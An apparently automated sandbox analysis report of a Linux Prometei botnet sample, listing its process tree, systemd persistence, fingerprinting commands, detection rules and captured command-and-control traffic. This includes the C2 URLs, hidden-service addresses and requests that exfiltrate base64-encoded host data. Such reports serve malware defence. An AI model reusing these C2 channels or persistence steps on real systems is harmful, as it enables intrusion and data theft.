Create Interactive Tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1652674
MD5:eccb01bcdff87829f8e499f453ad4629
SHA1:3d6298a9284b9b8f65ff6ed65c75164e34aa3127
SHA256:9a5e9270549adfa95956c826bb15b51ba0e2005ad79f16285018126323856783
Tags:elfuser-abuse_ch
Infos:

Detection

Prometei
Score:100
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Prometei
Drops files in suspicious directories
Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)
Found Tor onion address
Sample deletes itself
Sample is packed with UPX
Creates hidden files and/or directories
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "pgrep" command search for and/or send signals to processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "uname" command used to read OS and architecture name
HTTP GET or POST without a user agent
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Sample tries to set the executable flag
Suricata IDS alerts with low severity for network traffic
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1652674
Start date and time:2025-03-31 11:27:17 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 3s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal100.troj.evad.linELF@0/13@1/0
  • VT rate limit hit for: http://152.36.128.18/cgi-bin/p.cgi?r=22&i=162XYDVI8U344LH4
Command:/tmp/na.elf
PID:6208
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Starting...
System install...OK
Standard Error:Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.
  • system is lnxubuntu20
  • na.elf (PID: 6208, Parent: 6123, MD5: eccb01bcdff87829f8e499f453ad4629) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 6211, Parent: 6208)
    • sh (PID: 6211, Parent: 6208, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep na.elf"
      • sh New Fork (PID: 6212, Parent: 6211)
      • pgrep (PID: 6212, Parent: 6211, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep na.elf
    • na.elf New Fork (PID: 6215, Parent: 6208)
    • sh (PID: 6215, Parent: 6208, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"
      • sh New Fork (PID: 6216, Parent: 6215)
      • pgrep (PID: 6216, Parent: 6215, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay
    • na.elf New Fork (PID: 6219, Parent: 6208)
    • sh (PID: 6219, Parent: 6208, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof uplugplay"
      • sh New Fork (PID: 6220, Parent: 6219)
      • pidof (PID: 6220, Parent: 6219, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof uplugplay
    • na.elf New Fork (PID: 6225, Parent: 6208)
    • sh (PID: 6225, Parent: 6208, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"
      • sh New Fork (PID: 6226, Parent: 6225)
      • pgrep (PID: 6226, Parent: 6225, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup
    • na.elf New Fork (PID: 6229, Parent: 6208)
    • sh (PID: 6229, Parent: 6208, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"
      • sh New Fork (PID: 6230, Parent: 6229)
      • pidof (PID: 6230, Parent: 6229, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup
    • na.elf New Fork (PID: 6233, Parent: 6208)
    • sh (PID: 6233, Parent: 6208, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 6234, Parent: 6233)
      • systemctl (PID: 6234, Parent: 6233, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • na.elf New Fork (PID: 6248, Parent: 6208)
    • sh (PID: 6248, Parent: 6208, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"
      • sh New Fork (PID: 6249, Parent: 6248)
      • systemctl (PID: 6249, Parent: 6248, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service
    • na.elf New Fork (PID: 6253, Parent: 6208)
    • sh (PID: 6253, Parent: 6208, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"
      • sh New Fork (PID: 6254, Parent: 6253)
      • systemctl (PID: 6254, Parent: 6253, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service
  • systemd New Fork (PID: 6236, Parent: 6235)
  • snapd-env-generator (PID: 6236, Parent: 6235, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6251, Parent: 6250)
  • snapd-env-generator (PID: 6251, Parent: 6250, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6255, Parent: 1)
  • uplugplay (PID: 6255, Parent: 1, MD5: eccb01bcdff87829f8e499f453ad4629) Arguments: /usr/sbin/uplugplay
    • uplugplay New Fork (PID: 6257, Parent: 6255)
      • sh (PID: 6258, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"
        • sh New Fork (PID: 6259, Parent: 6258)
        • uplugplay (PID: 6259, Parent: 6258, MD5: eccb01bcdff87829f8e499f453ad4629) Arguments: /usr/sbin/uplugplay -Dcomsvc
          • sh (PID: 6263, Parent: 6259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl
            • sh New Fork (PID: 6264, Parent: 6263)
            • hostnamectl (PID: 6264, Parent: 6263, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl
          • sh (PID: 6267, Parent: 6259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl
            • sh New Fork (PID: 6406, Parent: 6267)
            • hostnamectl (PID: 6406, Parent: 6267, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl
          • sh (PID: 6413, Parent: 6259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6414, Parent: 6413)
            • dmidecode (PID: 6414, Parent: 6413, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6417, Parent: 6259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6420, Parent: 6417)
            • uptime (PID: 6420, Parent: 6417, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6424, Parent: 6259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode
            • sh New Fork (PID: 6425, Parent: 6424)
            • dmidecode (PID: 6425, Parent: 6424, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode
          • sh (PID: 6430, Parent: 6259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6431, Parent: 6430)
            • uname (PID: 6431, Parent: 6430, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
          • sh (PID: 6436, Parent: 6259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6437, Parent: 6436)
            • uptime (PID: 6437, Parent: 6436, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6440, Parent: 6259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6441, Parent: 6440)
            • uname (PID: 6441, Parent: 6440, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
  • systemd New Fork (PID: 6269, Parent: 1)
  • systemd-hostnamed (PID: 6269, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • fwupd New Fork (PID: 6375, Parent: 1)
  • gpg (PID: 6375, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: /usr/bin/gpg --version
  • fwupd New Fork (PID: 6408, Parent: 1)
  • gpg (PID: 6408, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
  • fwupd New Fork (PID: 6419, Parent: 1)
  • gpg (PID: 6419, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
  • fwupd New Fork (PID: 6427, Parent: 1)
  • gpg (PID: 6427, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
  • fwupd New Fork (PID: 6433, Parent: 1)
  • gpg (PID: 6433, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
  • dash New Fork (PID: 6472, Parent: 4335)
  • rm (PID: 6472, Parent: 4335, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.wGWDQF8lGk /tmp/tmp.fcWJ0ImgwV /tmp/tmp.Llo4sBnTUT
  • dash New Fork (PID: 6473, Parent: 4335)
  • rm (PID: 6473, Parent: 4335, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.wGWDQF8lGk /tmp/tmp.fcWJ0ImgwV /tmp/tmp.Llo4sBnTUT
  • cleanup
SourceRuleDescriptionAuthorStrings
na.elfLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
SourceRuleDescriptionAuthorStrings
/usr/sbin/uplugplayLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
SourceRuleDescriptionAuthorStrings
6208.1.0000000000401000.00000000004f9000.r-x.sdmpLinux_Hacktool_Flooder_1a4eb229unknownunknown
  • 0x9beb:$a: F4 8B 45 E8 83 C0 01 89 45 F8 EB 0F 8B 45 E8 83 C0 01 89 45 F4 8B
6208.1.0000000000401000.00000000004f9000.r-x.sdmpLinux_Hacktool_Flooder_f454ec10unknownunknown
  • 0xb569:$a: 8B 45 EC 48 63 D0 48 8B 45 D0 48 01 D0 0F B6 00 3C 2E 75 4D 8B
6208.1.000000000052d000.0000000001575000.rw-.sdmpLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x7190db:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
Process Memory Space: na.elf PID: 6208JoeSecurity_PrometeiYara detected PrometeiJoe Security
    Process Memory Space: na.elf PID: 6208JoeSecurity_Prometei_1Yara detected PrometeiJoe Security
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-31T11:30:19.920406+020020445601A Network Trojan was detected192.168.2.23563318.8.8.853UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-31T11:28:13.644845+020028033053Unknown Traffic192.168.2.2358304152.36.128.1880TCP
      2025-03-31T11:28:18.426805+020028033053Unknown Traffic192.168.2.2358306152.36.128.1880TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: na.elfAvira: detected
      Source: /usr/sbin/uplugplayAvira: detection malicious, Label: LINUX/GM.Agent.JQ
      Source: na.elfReversingLabs: Detection: 47%

      Bitcoin Miner

      barindex
      Source: Yara matchFile source: Process Memory Space: na.elf PID: 6208, type: MEMORYSTR
      Source: /usr/sbin/uplugplay (PID: 6259)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6216)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6226)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6259)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/uptime (PID: 6420)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/uptime (PID: 6437)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2044560 - Severity 1 - ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern : 192.168.2.23:56331 -> 8.8.8.8:53
      Source: na.elf, 6208.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
      Source: na.elf, 6208.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: nNhttp://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
      Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?r=22&i=162XYDVI8U344LH4 HTTP/1.0Host: 152.36.128.18
      Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIyBkbWlkZWNvZGUgMy4yfDE3NDM0MTMyOTYNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=162XYDVI8U344LH4&h=galassia&enckey=NJo+BXgl1KsHxJmSQmN45beSwdCJidQTG2ru7xSmYKmlGhTrNT5KOOqpUgArbJ1t53AQnwnWLEPhF4POrFhXa4Sx4DZSZDY489p8V/yvdQCnQ1gkqzX4AKK76rphc5ovH+LWZa2zkMxk7TqZDLY0aCtaWNn0gYeymSI/bsJxTy8= HTTP/1.0Host: 152.36.128.18
      Source: /usr/sbin/uplugplay (PID: 6259)Socket: 0.0.0.0:89Jump to behavior
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58304 -> 152.36.128.18:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58306 -> 152.36.128.18:80
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?r=22&i=162XYDVI8U344LH4 HTTP/1.0Host: 152.36.128.18
      Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIyBkbWlkZWNvZGUgMy4yfDE3NDM0MTMyOTYNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=162XYDVI8U344LH4&h=galassia&enckey=NJo+BXgl1KsHxJmSQmN45beSwdCJidQTG2ru7xSmYKmlGhTrNT5KOOqpUgArbJ1t53AQnwnWLEPhF4POrFhXa4Sx4DZSZDY489p8V/yvdQCnQ1gkqzX4AKK76rphc5ovH+LWZa2zkMxk7TqZDLY0aCtaWNn0gYeymSI/bsJxTy8= HTTP/1.0Host: 152.36.128.18
      Source: global trafficDNS traffic detected: DNS query: xinchaodbcfda.com
      Source: na.elf, uplugplay.12.drString found in binary or memory: http://152.36.128
      Source: na.elf, 6208.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://152.36.128.18/cgi-bin/p.cgi
      Source: na.elf, 6208.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni
      Source: na.elf, 6208.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
      Source: na.elf, 6208.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
      Source: na.elf, uplugplay.12.drString found in binary or memory: http://upx.sf.net
      Source: na.elf, 6208.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55240 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33610
      Source: unknownNetwork traffic detected: HTTP traffic on port 33610 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55240
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

      System Summary

      barindex
      Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
      Source: 6208.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_1a4eb229 Author: unknown
      Source: 6208.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_f454ec10 Author: unknown
      Source: 6208.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
      Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
      Source: LOAD without section mappingsProgram segment: 0x400000
      Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
      Source: 6208.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_1a4eb229 reference_sample = bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = de076ef23c2669512efc00ddfe926ef04f8ad939061c69131a0ef9a743639371, id = 1a4eb229-a194-46a5-8e93-370a40ba999b, last_modified = 2021-09-16
      Source: 6208.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_f454ec10 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 0297e1ad6e180af85256a175183102776212d324a2ce0c4f32e8a44a2e2e9dad, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = 2ae5e2c3190a4ce5d238efdb10ac0520987425fb7af52246b6bf948abd0259da, id = f454ec10-7a67-4717-9e95-fecb7c357566, last_modified = 2022-01-26
      Source: 6208.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
      Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
      Source: classification engineClassification label: mal100.troj.evad.linELF@0/13@1/0

      Data Obfuscation

      barindex
      Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sampleString containing UPX found: $Id: UPX 4.24 Copyright (C) 1996-2024 the UPX Team. All Rights Reserved. $
      Source: /usr/bin/pidof (PID: 6220)Directory: //.Jump to behavior
      Source: /usr/bin/pidof (PID: 6230)Directory: //.Jump to behavior
      Source: /lib/systemd/systemd-hostnamed (PID: 6269)Directory: <invalid fd (10)>/..Jump to behavior
      Source: /usr/bin/gpg (PID: 6408)File: /var/lib/fwupd/gnupg/.#lk0x0000556022dc7b80.galassia.6408Jump to behavior
      Source: /usr/bin/gpg (PID: 6419)File: /var/lib/fwupd/gnupg/.#lk0x0000556d9831eb80.galassia.6419Jump to behavior
      Source: /usr/bin/gpg (PID: 6427)File: /var/lib/fwupd/gnupg/.#lk0x000056290bcbab80.galassia.6427Jump to behavior
      Source: /usr/bin/gpg (PID: 6433)File: /var/lib/fwupd/gnupg/.#lk0x000055777127ab80.galassia.6433Jump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1582/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1582/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/3088/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/3088/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/230/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/230/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/110/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/110/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/231/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/231/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/111/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/111/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/232/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/232/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1579/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/1579/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/112/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6212)File opened: /proc/112/cmdlineJump to behavior
